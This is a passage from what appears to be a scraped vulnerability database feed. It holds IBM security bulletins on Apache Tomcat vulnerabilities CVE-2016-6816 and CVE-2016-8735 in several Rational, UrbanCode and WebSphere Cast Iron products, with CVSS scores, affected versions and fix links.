1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679281>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**RRDI 2.0.5 and 2.0.6 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.2.1 Interim Fix 19 (Implemented by file 10.2.5000.537)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043288>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n**RRDI 5.0 and 5.0.1 and 5.0.2 ** \n \n\n\n 1. If the Data Collection Component (DCC) or Jazz Reporting Service (JRS, also known as Report Builder) is used, perform this step first. \nReview the topics in [Security Bulletin: Multiple security vulnerabilities have been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-6816,CVE-2016-8735)](<http://www-01.ibm.com/support/docview.wss?uid=swg21996898>) for addressing the listed vulnerability in the underlying Jazz Team Server. \n\n 2. If the Cognos-based reporting server is used, also perform this step. \nDownload the [IBM Cognos Business Intelligence 10.2.1.1 Interim Fix 18 (Implemented by file 10.2.5012.504)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043288>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:19:05", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities in Apache Tomcat affect Rational Reporting for Development Intelligence (CVE-2016-6816, CVE-2016-8735)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2018-06-17T05:19:05", "id": "D28A33DD6F9F0616BF17BE9435C16BA5747AE3606D1B535CC4C8068BCF7BF4EB", "href": "https://www.ibm.com/support/pages/node/289763", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:48:34", "description": "## Summary\n\nJazz Team Server is shipped as a component of Jazz Reporting Service (JRS). Information about multiple security vulnerabilities affecting Jazz Team Server and Jazz-based products has been published in a security bulletin. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119158> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n\n**CVEID:** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119157> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nJRS 5.0, 5.0.1, 5.0.2| Jazz Foundation 5.0, 5.0.1, 5.0.2 \nJRS 6.0, 6.0.1, 6.0.2, 6.0.3| Jazz Foundation 6.0, 6.0.1, 6.0.2, 6.0.3 \n* Both JRS and Jazz Foundation are part of Rational Collaborative Lifecycle Management. \n\n## Remediation/Fixes\n\n \nConsult the security bulletin [Security Bulletin: Security vulnerabilities in Apache Tomcat affects multiple IBM Rational products based on IBM's Jazz technology](<https://www-01.ibm.com/support/docview.wss?uid=swg21997084>) for vulnerability details and information about fixes.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:18:54", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-6816,CVE-2016-8735)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2018-06-17T05:18:54", "id": "B0917B9B05986D5C57AFA7D61D59DB3AC46BF8A66810DCCC331CD59E3A0CC975", "href": "https://www.ibm.com/support/pages/node/289075", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-12T18:18:27", "description": "## Summary\n\nThe Jazz Team Server is shipped with or supports versions of the Apache Tomcat web server which contain security vulnerabilities that could potentially impact the following IBM Rational products deployed on Apache Tomcat: Collaborative Lifecycle Management (CLM), Rational DOORS Next Generation (RDNG), Rational Engineering Lifecycle Manager (RELM), Rhapsody Design Manager (Rhapsody DM), Rational Software Architect Design Manager (RSA DM), Rational Team Concert (RTC), and Rational Quality Manager (RQM).\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-6816_](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119158_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119158>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID:** [_CVE-2016-8735_](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119157_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119157>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nRational Collaborative Lifecycle Management 4.0 - 6.0.3 \n \nRational Quality Manager 4.0 - 4.0.7 \nRational Quality Manager 5.0 - 5.0.2 \nRational Quality Manager 6.0 - 6.0.3 \n \nRational Team Concert 4.0 - 4.0.7 \nRational Team Concert 5.0 - 5.0.2 \nRational Team Concert 6.0 - 6.0.3 \n \nRational DOORS Next Generation 4.0.1 - 4.0.7 \nRational DOORS Next Generation 5.0 - 5.0.2 \nRational DOORS Next Generation 6.0 - 6.0.3 \n \nRational Engineering Lifecycle Manager 4.0.3 - 4.0.7 \nRational Engineering Lifecycle Manager 5.0 - 5.0.2 \nRational Engineering Lifecycle Manager 6.0 - 6.0.3 \n \nRational Rhapsody Design Manager 4.0 - 4.0.7 \nRational Rhapsody Design Manager 5.0 - 5.0.2 \nRational Rhapsody Design Manager 6.0 - 6.0.3 \n \nRational Software Architect Design Manager 4.0 - 4.0.7 \nRational Software Architect Design Manager 5.0 - 5.0.2 \nRational Software Architect Design Manager 6.0 - 6.0.1\n\n## Remediation/Fixes\n\nIn order to get all the available security updates, upgrade your products to version **4.0.7** or **5.0.2** or **6.0.2** or **6.0.3**, apply the latest ifix, and then perform the following upgrade: \n\n\n * The fixes are in Apache Tomcat version 7.0.73 or later. Perform [_How to update the Apache Tomcat server for IBM Rational products based on versions 3.0.1.6, 4.0.7 or later of IBM's Jazz technology_](<http://www.ibm.com/support/docview.wss?uid=swg21687641>) to apply the remediation.\n \n**Note:** If you cannot upgrade to 4.0.7 or 5.0.2 or 6.0.2 or 6.0.3, contact [IBM support](<https://www.ibm.com/support/servicerequest>) for guidance. \n. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-28T18:35:50", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities in Apache Tomcat affects multiple IBM Rational products based on IBM's Jazz technology", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2021-04-28T18:35:50", "id": "6D6FD3B17FF4E3AEC7C3300A59DF811D1AEFB71253A1B03A9B6D6569C666112F", "href": "https://www.ibm.com/support/pages/node/289331", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T17:45:51", "description": "## Summary\n\nMultiple vulnerabilities in Apache Tomcat affect IBM UrbanCode Release\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119158>)<https://exchange.xforce.ibmcloud.com/vulnerabilities/119158> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n\n**CVEID:**[ CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION: **Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119157>)<https://exchange.xforce.ibmcloud.com/vulnerabilities/119157> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM UrbanCode Release 6.2.0.0 - 6.2.1.2\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **Remediation/First Fix** \n---|---|--- \nIBM UrbanCode Release| 6.2.0.0 \n6.2.1.0 \n6.2.1.1 \n6.2.1.2| [6.2.1.3](<https://www-945.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm~Rational&product=ibm/Rational/UrbanCode+Release&release=6.2.1.0&platform=All&function=fixId&fixids=6.2.1.3-UrbanCode-Release&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:33:29", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Tomcat affect IBM UrbanCode Release", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2018-06-17T22:33:29", "id": "E026D876441506065638E9669757F49A62954ECA499F837804AD1070CA5C7B19", "href": "https://www.ibm.com/support/pages/node/599281", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:39:22", "description": "## Summary\n\nThere are vulnerabilities (CVE-2016-8735, CVE-2016-6816) reported in Apache Tomcat v6 that is used by WebSphere Cast Iron Solution. WebSphere Cast Iron has remediated the affected versions.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-8735_](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119157_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119157>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n**CVEID:** [_CVE-2016-6816_](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/119158_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/119158>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nWebSphere Cast Iron v 7.5.0.0, 7.5.0.1, 7.5.1.0 \nWebSphere Cast Iron v 7.0.0.0, 7.0.0.1, 7.0.0.2 \nWebSphere Cast Iron v 6.4.0.0, 6.4.0.1 \nWebSphere Cast Iron v 6.3.0.0, 6.3.0.1, 6.3.0.1\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nCast Iron Appliance| 7.5.0.0 \n7.5.0.1 \n7.5.1.0| LI79413| [7.5.1.0-CUMUIFIX-006](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=7.5.1.0&platform=All&function=fixId&fixids=7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.scrypt2,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.vcrypt2,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.32bit.sc-linux,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.sc-linux,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.32bit.sc-win,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.sc-win,7.5.1.0-WS-WCI-20170111-2346_H7_64-CUMUIFIX-006.32bit.studio,7.5.1.0-WS-WCI-20170111-2346_H7_64-CUMUIFIX-006.studio,7.5.1.0-WS-WCI-20170111-2346_H11_64-CUMUIFIX-006.docker&includeSupersedes=0>) \nCast Iron Appliance| 7.0.0.0 \n7.0.0.1 \n7.0.0.2| LI79413| [7.0.0.2-CUMUIFIX-034](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=7.0.0.2&platform=All&function=fixId&fixids=7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.scrypt2,7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.vcrypt2,7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.32bit.sc-linux,7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.32bit.sc-win,7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.sc-linux,7.0.0.2-WS-WCI-20170224-0554_H8_64-CUMUIFIX-034.sc-win,7.0.0.2-WS-WCI-20170224-0641_H9_64-CUMUIFIX-034.32bit.studio,7.0.0.2-WS-WCI-20170224-0641_H9_64-CUMUIFIX-034.studio&includeSupersedes=0>) \nCast Iron Appliance| 6.4.0.0 \n6.4.0.1| LI79413| [6.4.0.1-CUMUIFIX-043](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=6.4.0.1&platform=All&function=fixId&fixids=6.4.0.1-WS-WCI-20170125-1122_H3-CUMUIFIX-043.scrypt2,6.4.0.1-WS-WCI-20170125-1122_H3-CUMUIFIX-043.vcrypt2,6.4.0.1-WS-WCI-20170125-1213_H5-CUMUIFIX-043.studio&includeSupersedes=0>) \nCast Iron Appliance| 6.3.0.0 \n6.3.0.1 \n6.3.0.2| LI79413| [6.3.0.2-CUMUIFIX-024](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/WebSphere+Cast+Iron+Cloud+integration&release=6.3.0.2&platform=All&function=fixId&fixids=6.3.0.2-WS-WCI-20170125-1126_H4-CUMUIFIX-024.scrypt2,6.3.0.2-WS-WCI-20170125-1126_H4-CUMUIFIX-024.vcrypt2,6.3.0.2-WS-WCI-20170125-1127_H5-CUMUIFIX-024.studio&includeSupersedes=0>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-18T13:57:34", "type": "ibm", "title": "Security Bulletin: IBM WebSphere Cast Iron Solution is affected by Apache Tomcat vulnerabilities (CVE-2016-8735, CVE-2016-6816)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2019-11-18T13:57:34", "id": "7D29B4909C6BF3ADF472798B711970B396D8FD474F784096D0CD51E0C3DE6E56", "href": "https://www.ibm.com/support/pages/node/292627", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:48:32", "description": "## Summary\n\nThe Rational Insight is shipped with a version of the Apache Tomcat web server which contains security vulnerabilities that could have a potential security impact.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-6816](<https://vulners.com/cve/CVE-2016-6816>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to HTTP response splitting attacks, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject arbitrary HTTP headers and cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning or cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119158> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n\n**CVEID:** [CVE-2016-8735](<https://vulners.com/cve/CVE-2016-8735>)** \nDESCRIPTION:** Apache Tomcat could allow a remote attacker to execute arbitrary code on the system, caused by an error in the JmxRemoteLifecycleListener. By sending specially crafted data to a JMX port, an attacker could exploit this vulnerability to execute arbitrary code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/119157> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nRational Insight 1.1, 1.1.1, 1.1.1.1 and 1.1.1.2| Cognos BI 10.1.1 \nRational Insight 1.1.1.3| Cognos BI 10.2.1 \nRational Insight 1.1.1.4, 1.1.1.5 and 1.1.1.6| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 5.0, 5.0.1 and 5.0.2 \nRational Insight 1.1.1.7| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 6.0 \n \n## Remediation/Fixes\n\n \nApply the recommended fixes to all affected versions of Rational Insight. \n \n**Rational Insight 1.1 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 21 (Implemented by file 10.1.6306.520)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043287>). \nReview technote [1679272: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Insight 1.1](<http://www-01.ibm.com/support/docview.wss?uid=swg21679272>) for detailed instructions.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1, 1.1.1.1 and 1.1.1.2 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 21 (Implemented by file 10.1.6306.520)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043287>). \nRead technote [1679281: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Reporting for Development Intelligence 2.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679281>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.3 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.2.1 Interim Fix 19 (Implemented by file 10.2.5000.537)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043288>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.4 and 1.1.1.5 and 1.1.1.6 and 1.1.1.7 ** \n \n\n\n 1. If the Data Collection Component (DCC) or Jazz Reporting Service (JRS, also known as Report Builder) is used, perform this step first. \nReview the topics in [Security Bulletin: Multiple security vulnerabilities have been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-6816,CVE-2016-8735)](<http://www-01.ibm.com/support/docview.wss?uid=swg21996898>) for addressing the listed vulnerability in the underlying Jazz Team Server. \n\n 2. If the Cognos-based reporting server is used, also perform this step. \nDownload the [IBM Cognos Business Intelligence 10.2.1.1 Interim Fix 18 (Implemented by file 10.2.5012.504)](<http://www-01.ibm.com/support/docview.wss?uid=swg24043288>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:19:05", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities in Apache Tomcat affect Rational Insight (CVE-2016-6816, CVE-2016-8735)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6816", "CVE-2016-8735"], "modified": "2018-06-17T05:19:05", "id": "30B97F976830F38EC78A601AC4AF08E5E915E3601910C6A37C3824A2F36E31B8", "href": "https://www.ibm.com/support/pages/node/289765", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:51:25", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 7.0 that is used by IBM B2B Advanced Communications. These issues were disclosed as part of the IBM Java SDK updates for April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability in Oracle Java, SE Java SE Embedded and JRockit related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: 